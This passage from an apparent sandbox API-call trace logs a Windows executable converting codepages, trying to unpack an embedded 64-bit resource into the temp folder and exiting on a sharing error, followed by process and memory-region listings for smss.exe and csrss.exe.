lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x74\x4d\xfd\x61\xdc\xfe\x19", lpUsedDefaultChar=0x0) returned 256 [0259.947] GetLastError () returned 0x0 [0259.947] SetLastError (dwErrCode=0x0) [0259.947] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0259.947] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x19f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ@Ā") returned 256 [0259.947] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0259.947] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ@Ā", cchSrc=256, lpDestStr=0x19f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0259.947] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x19fba0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x74\x4d\xfd\x61\xdc\xfe\x19", lpUsedDefaultChar=0x0) returned 256 [0259.947] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0259.947] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40f584) returned 0x0 [0259.947] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75130000 [0259.947] GetProcAddress (hModule=0x75130000, lpProcName="IsWow64Process") returned 0x751496e0 [0259.947] GetCurrentProcess () returned 0xffffffff [0259.947] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19ff2c | out: Wow64Process=0x19ff2c) returned 1 [0259.947] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19fd20, nSize=0x104 | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe")) returned 0x2a [0259.947] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x19fb18, nSize=0x104 | out: lpDst="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp") returned 0x25 [0259.947] FindResourceW (hModule=0x0, lpName="RCHANDLE64", lpType="BINRES") returned 0x476060 [0259.948] LoadResource (hModule=0x0, hResInfo=0x476060) returned 0x43c648 [0259.948] SizeofResource (hModule=0x0, hResInfo=0x476060) returned 0x37490 [0259.948] LockResource (hResData=0x43c648) returned 0x43c648 [0259.948] GetCurrentPackageId () returned 0x3d54 [0259.948] CreateFileW (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vIDhS3md64.exe" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\vidhs3md64.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x19f954, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0259.948] GetLastError () returned 0x20 [0259.948] GetLastError () returned 0x20 [0259.948] SetLastError (dwErrCode=0x20) [0259.948] GetLastError () returned 0x20 [0259.948] SetLastError (dwErrCode=0x20) [0259.948] GetLastError () returned 0x20 [0259.948] SetLastError (dwErrCode=0x20) [0259.948] GetLastError () returned 0x20 [0259.948] SetLastError (dwErrCode=0x20) [0259.948] GetLastError () returned 0x20 [0259.948] SetLastError (dwErrCode=0x20) [0259.948] GetLastError () returned 0x20 [0259.948] SetLastError (dwErrCode=0x20) [0260.974] WriteFile (in: hFile=0xc0, lpBuffer=0x19ea00*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x19e32c, lpOverlapped=0x0 | out: lpBuffer=0x19ea00*, lpNumberOfBytesWritten=0x19e32c*=0x49, lpOverlapped=0x0) returned 1 [0260.976] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x19fed4 | out: phModule=0x19fed4) returned 0 [0260.976] ExitProcess (uExitCode=0x1) Thread: id = 812 os_tid = 0xdc8 Process: id = "33" image_name = "smss.exe" filename = "c:\\windows\\system32\\smss.exe" page_root = "0x683e3000" os_pid = "0x108" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "31" os_parent_pid = "0x4" cmd_line = "\\SystemRoot\\System32\\smss.exe" cur_dir = "C:\\Windows" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 314 os_tid = 0x2ac Thread: id = 315 os_tid = 0x114 Thread: id = 316 os_tid = 0x10c Process: id = "34" image_name = "csrss.exe" filename = "c:\\windows\\system32\\csrss.exe" page_root = "0x4b1e3000" os_pid = "0x154" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "33" os_parent_pid = "0x108" cmd_line = "%SystemRoot%\\system32\\csrss.exe ObjectDirectory=\\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Region: id = 3281 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3282 start_va = 0xc680000000 end_va = 0xc6800bdfff entry_point = 0xc680000000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3283 start_va = 0xc6800c0000 end_va = 0xc680240fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c6800c0000" filename = "" Region: id = 3284 start_va = 0xc6b0f10000 end_va = 0xc6b0f10fff entry_point = 0xc6b0f10000 region_type = mapped_file name = "csrss.exe.mui" filename = "\\Windows\\System32\\en-US\\csrss.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\csrss.exe.mui") Region: id = 3285 start_va = 0xc6b0f20000 end_va = 0xc6b0f21fff entry_point = 0xc6b0f20000 region_type = mapped_file name = "winsrv.dll.mui" filename = "\\Windows\\System32\\en-US\\winsrv.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winsrv.dll.mui") Region: id = 3286 start_va = 0xc6b0f30000 end_va = 0xc6b0f43fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c6b0f30000" filename = "" Region: id = 3287 start_va = 0xc6b0f50000 end_va = 0xc6b0f5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c6b0f50000" filename = "" Region: id = 3288 start_va = 0xc6b0f60000 end_va = 0xc6b0f66fff entry_point = 0xc6b0f60000 region_type = mapped_file name = "marlett.ttf" filename = "\\Windows\\Fonts\\marlett.ttf" (normalized: "c:\\windows\\fonts\\marlett.ttf") Region: id = 3289 start_va = 0xc6b0f70000 end_va = 0xc6b0f87fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c6b0f70000" filename = "" Region: id = 3290 start_va = 0xc6b0f90000 end_va = 0xc6b0f96fff entry_point = 0x0 region_type = private name = "private_0x000000c6b0f90000" filename = "" Region: id = 3291 start_va = 0xc6b0fa0000 end_va = 0xc6b0faffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c6b0fa0000" filename = "" Region: id = 3292 start_va = 0xc6b0fb0000 end_va = 0xc6b0fb1fff entry_point = 0xc6b0fb0000 region_type = mapped_file name = "vgaoem.fon" filename = "\\Windows\\Fonts\\vgaoem.fon" (normalized: "c:\\windows\\fonts\\vgaoem.fon") Region: id = 3293 start_va = 0xc6b0fc0000 end_va = 0xc6b0fcffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c6b0fc0000" filename = "" Region: id = 3294 start_va = 0xc6b0fe0000 end_va = 0xc6b0fe0fff entry_point = 0x0 region_type = private name = "private_0x000000c6b0fe0000" filename = "" Region: id = 3295 start_va = 0xc6b0ff0000 end_va = 0xc6b0ff1fff entry_point = 0xc6b0ff0000 region_type = mapped_file name = "vgasys.fon" filename = "\\Windows\\Fonts\\vgasys.fon" (normalized: "c:\\windows\\fonts\\vgasys.fon") Region: id = 3296 start_va = 0xc6b1000000 end_va = 0xc6b10fffff entry_point = 0x0 region_type = private name = "private_0x000000c6b1000000" filename = "" Region: id = 3297 start_va = 0xc6b1100000 end_va = 0xc6b113ffff entry_point = 0x0 region_type = private name = "private_0x000000c6b1100000" filename = "" Region: id = 3298 start_va = 0xc6b1140000 end_va = 0xc6b117ffff entry_point = 0x0 region_type = private name = "private_0x000000c6b1140000" filename = "" Region: id = 3299 start_va = 0xc6b1180000 end_va = 0xc6b11bffff entry_point = 0x0 region_type = private name = "private_0x000000c6b1180000" filename = "" Region: id = 3300 start_va = 0xc6b11c0000 end_va = 0xc6b11fffff entry_point = 0x0 region_type = private name = "private_0x000000c6b11c0000" filename = "" Region: id = 3301 start_va = 0xc6b1200000 end_va = 0xc6b1387fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c6b1200000" filename = "" Region: id = 3302 start_va = 0xc6b1390000 end_va = 0xc6b1390fff entry_point = 0x0 region_type = private name = "private_0x000000c6b1390000" filename = "" Region: id = 3303 start_va = 0xc6b13a0000 end_va = 0xc6b13dffff entry_point = 0x0 region_type = private name = "private_0x000000c6b13a0000" filename = "" Region: id = 3304 start_va = 0xc6b13e0000 end_va = 0xc6b141ffff entry_point = 0x0 region_type = private name = "private_0x000000c6b13e0000" filename = "" Region: id = 3305 start_va = 0xc6b1420000 end_va = 0xc6b145ffff entry_point = 0x0 region_type = private name = "private_0x000000c6b1420000" filename = "" Region: id = 3306 start_va = 0xc6b1460000 end_va = 0xc6b153efff entry_point = 0xc6b1460000 region_type = mapped_file name = "segoeui.ttf" filename = "\\Windows\\Fonts\\segoeui.ttf" (normalized: "c:\\windows\\fonts\\segoeui.ttf") Region: id = 3307 start_va = 0xc6b1540000 end_va = 0xc6b156ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c6b1540000" filename = "" Region: id = 3308 start_va = 0xc6b1570000 end_va = 0xc6b296ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c6b1570000" filename = "" Region: id = 3309 start_va = 0xc6b2970000 end_va = 0xc6b2970fff entry_point = 0x0 region_type = private name = "private_0x000000c6b2970000" filename = "" Region: id = 3310 start_va = 0xc6b2980000 end_va = 0xc6b2980fff entry_point = 0x0 region_type = private name = "private_0x000000c6b2980000" filename = "" Region: id = 3311 start_va = 0xc6b2990000 end_va = 0xc6b299ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c6b2990000" filename = "" Region: id = 3312 start_va = 0xc6b29a0000 end_va = 0xc6b29affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c6b29a0000" filename = "" Region: id = 3313 start_va = 0xc6b29b0000 end_va = 0xc6b29bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c6b29b0000" filename = "" Region: id = 3314 start_va = 0xc6b29c0000 end_va = 0xc6b29cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c6b29c0000" filename = "" Region: id = 3315 start_va = 0xc6b29d0000 end_va = 0xc6b29dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c6b29d0000" filename = "" Region: id = 3316 start_va = 0xc6b29e0000 end_va = 0xc6b2a1ffff entry_point = 0x0 region_type = private name = "private_0x000000c6b29e0000" filename = "" Region: id = 3317 start_va = 0xc6b2a20000 end_va = 0xc6b2adffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c6b2a20000" filename = "" Region: id = 3318 start_va = 0xc6b2ae0000 end_va = 0xc6b2aeffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c6b2ae0000" filename = "" Region: id = 3319 start_va = 0xc6b2af0000 end_va = 0xc6b2baffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c6b2af0000" filename = "" Region: id = 3320 start_va = 0xc6b2bb0000 end_va = 0xc6b2bbffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c6b2bb0000" filename = "" Region: id = 3321 start_va = 0xc6b2bc0000 end_va = 0xc6b2bcffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c6b2bc0000" filename = "" Region: id = 3322 start_va = 0xc6b2bd0000 end_va = 0xc6b2bdffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c6b2bd0000" filename = "" Region: id = 3323 start_va = 0xc6b2be0000 end_va = 0xc6b2beffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c6b2be0000" filename = "" Region: id = 3324 start_va = 0xc6b2bf0000 end_va = 0xc6b2caffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c6b2bf0000" filename = "" Region: id = 3325 start_va = 0xc6b2cb0000 end_va = 0xc6b2cbffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c6b2cb0000" filename = "" Region: id = 3326 start_va = 0xc6b2cd0000 end_va = 0xc6b2cdffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c6b2cd0000" filename = "" Region: id = 3327 start_va = 0xc6b2ce0000 end_va = 0xc6b2d1ffff entry_point = 0x0 region_type = private name = "private_0x000000c6b2ce0000" filename = "" Region: id = 3328 start_va = 0xc6b2d20000 end_va = 0xc6b2d2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c6b2d20000" filename = "" Region: id = 3329 start_va = 0xc6b2d30000 end_va = 0xc6b2d3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c6b2d30000" filename = "" Region: id = 3330 start_va = 0xc6b2d50000 end_va = 0xc6b2d58fff entry_point = 0xc6b2d50000 region_type = mapped_file name = "dosapp.fon" filename = "\\Windows\\Fonts\\dosapp.fon" (normalized: "c:\\windows\\fonts\\dosapp.fon") Region: id = 3331 start_va = 0xc6b2d60000 end_va = 0xc6b2d61fff entry_point = 0xc6b2d60000 region_type = mapped_file name = "cga40woa.fon" filename = "\\Windows\\Fonts\\cga40woa.fon" (normalized: "c:\\windows\\fonts\\cga40woa.fon") Region: id = 3332 start_va = 0xc6b2d70000 end_va = 0xc6b2d71fff entry_point = 0xc6b2d70000 region_type = mapped_file name = "cga80woa.fon" filename = "\\Windows\\Fonts\\cga80woa.fon" (normalized: "c:\\windows\\fonts\\cga80woa.fon") Region: id = 3333 start_va = 0xc6b2d80000 end_va = 0xc6b2d82fff entry_point = 0xc6b2d80000 region_type = mapped_file name = "ega40woa.fon" filename = "\\Windows\\Fonts\\ega40woa.fon" (normalized: "c:\\windows\\fonts\\ega40woa.fon") Region: id = 3334 start_va = 0xc6b2d90000 end_va = 0xc6b2d9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c6b2d90000" filename = "" Region: id = 3335 start_va = 0x7df5ff120000 end_va = 0x7ff5ff11ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff120000" filename = "" Region: id = 3336 start_va = 0x7ff655b48000 end_va = 0x7ff655b49fff entry_point = 0x0 region_type = private name = "private_0x00007ff655b48000" filename = "" Region: id = 3337 start_va = 0x7ff655b4a000 end_va = 0x7ff655b4bfff entry_point = 0x0 region_type = private name = "private_0x00007ff655b4a000" filename = "" Region: id = 3338 start_va = 0x7ff655b4c000 end_va = 0x7ff655b4dfff entry_point = 0x0 region_type = private name = "private_0x00007ff655b4c000" filename = "" Region: id = 3339 start_va = 0x7ff655b4e000 end_va = 0x7ff655b4ffff entry_point = 0x0 region_type = private name = "private_0x00007ff655b4e000" filename = "" Region: id = 3340 start_va = 0x7ff655b50000 end_va = 0x7ff655c4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff655b50000" filename = "" Region: id = 3341 start_va = 0x7ff655c50000 end_va = 0x7ff655c72fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff655c50000" filename = "" Region: id = 3342 start_va = 